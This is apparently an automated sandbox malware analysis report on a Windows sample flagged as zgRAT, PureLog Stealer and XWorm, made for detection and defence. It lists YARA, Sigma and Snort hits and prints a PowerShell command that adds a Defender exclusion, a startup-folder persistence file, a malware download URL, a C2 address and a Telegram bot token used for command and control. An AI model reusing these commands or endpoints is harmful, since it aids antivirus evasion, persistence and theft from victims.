0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9ddfe:$s1: file:/// 0x9dd0e:$s2: {11111-22222-10009-11112} 0x9dd8e:$s3: {11111-22222-50001-00000} 0x96b22:$s4: get_Module 0x96fa3:$s5: Reverse 0x9ce54:$s6: BlockCopy 0x9d7be:$s7: ReadByte 0x9de10:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.9NBx4Vmiuj.exe.2341c890000.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.9NBx4Vmiuj.exe.2342cfd8230.6.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9fbfe:$s1: file:/// 0x9fb0e:$s2: {11111-22222-10009-11112} 0x9fb8e:$s3: {11111-22222-50001-00000} 0x98922:$s4: get_Module 0x98da3:$s5: Reverse 0x9ec54:$s6: BlockCopy 0x9f5be:$s7: ReadByte 0x9fc10:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.9NBx4Vmiuj.exe.2342d0c82a0.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.9NBx4Vmiuj.exe.2342cfb01f8.12.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x15fc6e:$s1: file:/// 0x15fb7e:$s2: {11111-22222-10009-11112} 0x15fbfe:$s3: {11111-22222-50001-00000} 0x158992:$s4: get_Module 0x158e13:$s5: Reverse 0x15ecc4:$s6: BlockCopy 0x15f62e:$s7: ReadByte 0x15fc80:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
7.2.TypeId.exe.20926dfd5f0.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9fbfe:$s1: file:/// 0x9fb0e:$s2: {11111-22222-10009-11112} 0x9fb8e:$s3: {11111-22222-50001-00000} 0x98922:$s4: get_Module 0x98da3:$s5: Reverse 0x9ec54:$s6: BlockCopy 0x9f5be:$s7: ReadByte 0x9fc10:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9ddfe:$s1: file:/// 0x9dd0e:$s2: {11111-22222-10009-11112} 0x9dd8e:$s3: {11111-22222-50001-00000} 0x96b22:$s4: get_Module 0x96fa3:$s5: Reverse 0x9ce54:$s6: BlockCopy 0x9d7be:$s7: ReadByte 0x9de10:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.9NBx4Vmiuj.exe.23435160000.14.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.9NBx4Vmiuj.exe.23435160000.14.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.9NBx4Vmiuj.exe.23435160000.14.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9ddfe:$s1: file:/// 0x9dd0e:$s2: {11111-22222-10009-11112} 0x9dd8e:$s3: {11111-22222-50001-00000} 0x96b22:$s4: get_Module 0x96fa3:$s5: Reverse 0x9ce54:$s6: BlockCopy 0x9d7be:$s7: ReadByte 0x9de10:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x11fc36:$s1: file:/// 0x11fb46:$s2: {11111-22222-10009-11112} 0x11fbc6:$s3: {11111-22222-50001-00000} 0x11895a:$s4: get_Module 0x118ddb:$s5: Reverse 0x11ec8c:$s6: BlockCopy 0x11f5f6:$s7: ReadByte 0x11fc48:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 64 entries

Sigma Signatures

System Summary

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe, ParentImage: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe, ParentProcessId: 1248, ParentProcessName: TypeId.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, ProcessId: 348, ProcessName: RegSvcs.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\btjxg.exe", ParentImage: C:\Users\user\AppData\Local\Temp\btjxg.exe, ParentProcessId: 1784, ParentProcessName: btjxg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', ProcessId: 2284, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\btjxg.exe", ParentImage: C:\Users\user\AppData\Local\Temp\btjxg.exe, ParentProcessId: 1784, ParentProcessName: btjxg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', ProcessId: 2284, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\btjxg.exe", ParentImage: C:\Users\user\AppData\Local\Temp\btjxg.exe, ParentProcessId: 1784, ParentProcessName: btjxg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', ProcessId: 2284, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\btjxg.exe", ParentImage: C:\Users\user\AppData\Local\Temp\btjxg.exe, ParentProcessId: 1784, ParentProcessName: btjxg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', ProcessId: 2284, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\btjxg.exe, ProcessId: 1784, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\btjxg.lnk

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\btjxg.exe", ParentImage: C:\Users\user\AppData\Local\Temp\btjxg.exe, ParentProcessId: 1784, ParentProcessName: btjxg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe', ProcessId: 2284, ProcessName: powershell.exe

Snort Signatures

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 157.254.223.19 - Destination IP: 192.168.2.5

Timestamp:	03/26/24-18:25:18.899869
SID:	2852870
Source Port:	8081
Destination Port:	49797
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 9NBx4Vmiuj.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://185.196.10.233/dggfsff.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Avira: detection malicious, Label: HEUR/AGEN.1313071
Source: C:\ProgramData\btjxg.exe	Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: btjxg.exe.1784.4.memstrmin

Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\btjxg.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: 9NBx4Vmiuj.exe

ReversingLabs: Detection: 55%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\btjxg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 9NBx4Vmiuj.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: 157.254.223.19
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: 8081
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: private@123
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: <Xwormmm>
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: USB.exe
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: bc1qvnmel0wr7n7xam2jq9cd6v9kq9ll0fc3ps5j2p
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: 0x459d192EF8f2288915a6aA1A6F2f9685A42dd7e4
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: TRDyFoJLpPN2oCCX4ANzpcEiJJiZSR9uZQ
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: 5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: 1267602057

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49794 version: TLS 1.2

Source: 9NBx4Vmiuj.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2133599279.0000023435360000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D24F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2133599279.0000023435360000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D24F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Pjraflkwkhj.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, TypeId.exe, 00000002.00000002.2158779274.000002184E741000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3409147293.000001E3C9781000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2610110087.0000020937261000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
